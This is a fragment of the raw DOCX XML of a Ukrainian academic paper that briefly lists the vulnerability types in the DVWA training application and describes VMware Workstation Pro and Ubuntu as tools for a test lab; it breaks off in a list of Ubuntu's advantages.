        <w:t>Виконання команд: виконання команд рівня операційної системи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9C61E" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Міжсайтова підробка запиту (CSRF): дозволяє атакуючому змінити пароль адміністратора додатків.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A224204" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SQL ін’єкція: дозволяє атакуючому впровадити SQL вираз в HTTP із поля вводу, DWVA включає сліпу і основану на помилці SQL ін’єкцію</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B7A7A" w14:textId="62BF12E9" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Міжсайтовий скриптинг (XSS): атакуючий може впровадити свої с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>крипти в веб-додаток/базу даних</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA69128" w14:textId="77777777" w:rsidR="00CE1AA4" w:rsidRPr="00B94A6A" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1B88AB" w14:textId="55708288" w:rsidR="00CE1AA4" w:rsidRPr="00D84A48" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B0BFC6" wp14:editId="46FC3B01">
            <wp:extent cx="4850130" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="762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50130" cy="2735580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56D97E" w14:textId="3AC0B160" w:rsidR="00CE1AA4" w:rsidRDefault="00CE1AA4" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>DWVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6179C2" w14:textId="77777777" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00CE1AA4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEBB71C" w14:textId="7A9C4790" w:rsidR="00614A79" w:rsidRDefault="00614A79" w:rsidP="00614A79">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc30433154"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="00FD3159">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD3159">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Описання </w:t>
      </w:r>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>VMware Workstation Pro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="6C08ADD8" w14:textId="77777777" w:rsidR="00FD3159" w:rsidRPr="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5043255C" w14:textId="50F5DE25" w:rsidR="00CE1AA4" w:rsidRDefault="00614A79" w:rsidP="00FD3159">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>рис</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>. 3.</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>— гіпервізор компанії VMware</w:t>
      </w:r>
      <w:r w:rsidR="00942EFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, який здатний запустити пару операційних систем одночасно. </w:t>
      </w:r>
      <w:r w:rsidR="00942EFE" w:rsidRPr="00942EFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Програмне забезпечення VMware Workstation Pro пропонує сучасні можливості для фахівців, що працюють з віртуальними машинами. Рішення VMware Workstation Pro  призначений для розробки, тестування, демонстрації та розгортання програмного забезпечення за рахунок одночасного запуску декількох операційних систем, призначених для архітектури x86, на одному ПК. Завдяки підтримці останніх версій Windows і Linux, новітніх процесорів і обладнання, а також можливості підключення до VMware vCloud Air і VMware vSphere програма VMware Workstation є ідеальним рішенням для підвищення ефективності роботи, економії часу і освоєння хмари.</w:t>
      </w:r>
      <w:r w:rsidR="00942EFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942EFE" w:rsidRPr="00942EFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рішення Workstation забезпечує безпеку і захист віртуальних машин, а також економію часу при роботі з ними завдяки використанню можливостей створення знімків і клонів. За допомогою знімків користувачі можуть зберігати стан віртуальних машин і при необхідності повертатися до нього. В Workstation можна легко додавати віртуальні машини шляхом клонування, тобто створення необмеженого числа копій віртуальної машини в рамках базового процесу установки і настройки. Механізм пов'язаних клонів - це ще більш швидкий, зручний і ефективний спосіб дублювання складних параметрів </w:t>
      </w:r>
      <w:r w:rsidR="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="00942EFE" w:rsidRPr="00942EFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для тестування і спеціальних демонстрацій. За допомогою механізму пов'язаних клонів створюється копія віртуальної машини, яка використовує віртуальні диски батьківської віртуальної машини, але при цьому займає значно менше дискового простору</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [37]</w:t>
      </w:r>
      <w:r w:rsidR="00FD3159" w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A70597B" w14:textId="77777777" w:rsidR="00CA572F" w:rsidRPr="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7001E4" w14:textId="01D52722" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B99C7A" wp14:editId="3E55F7B8">
            <wp:extent cx="6120130" cy="3319780"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="139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3319780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63035FC7" w14:textId="0A48ECC0" w:rsidR="00CA572F" w:rsidRDefault="00CA572F" w:rsidP="00CA572F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис. 3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA572F">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VMware Workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31534A" w14:textId="1AE223FC" w:rsidR="00614A79" w:rsidRPr="00CA572F" w:rsidRDefault="00614A79" w:rsidP="00CA572F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298DAA08" w14:textId="22DDC889" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc30433155"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="00A846AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Описання</w:t>
      </w:r>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w14:paraId="0DC1C38A" w14:textId="77777777" w:rsidR="00FD3159" w:rsidRPr="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1822BE" w14:textId="0B35C8D0" w:rsidR="00FD3159" w:rsidRPr="005B4CE1" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(рис. 3.</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00CA572F" w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> - заснована на ядрі </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> операційна система, яка ідеально підходить для використання на персональних комп'ютерах, ноутбуках і серверах. Вона містить всі необхідні програми, які вам потрібні: програму перегляду Інтернет, офісний пакет для роботи з текстами, електронними таблицями і презентаціями, програми для спілкування в Інтернет і багато інш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1" w:rsidRPr="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B4CE1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[38]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028CA1B7" w14:textId="0D271951" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Переваги </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3002F665" w14:textId="78591200" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> завжди буде поширюватися безкоштовно, включаючи корпоративні версії і оновлення безпеки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C147D8B" w14:textId="4C5B2C69" w:rsidR="00FD3159" w:rsidRDefault="00FD3159" w:rsidP="00FD3159">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Для </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступна повна комерційна підтримка від </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Canonical</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-CA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ltd</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3159">
        <w:rPr>
          <w:sz w:val="28"/>
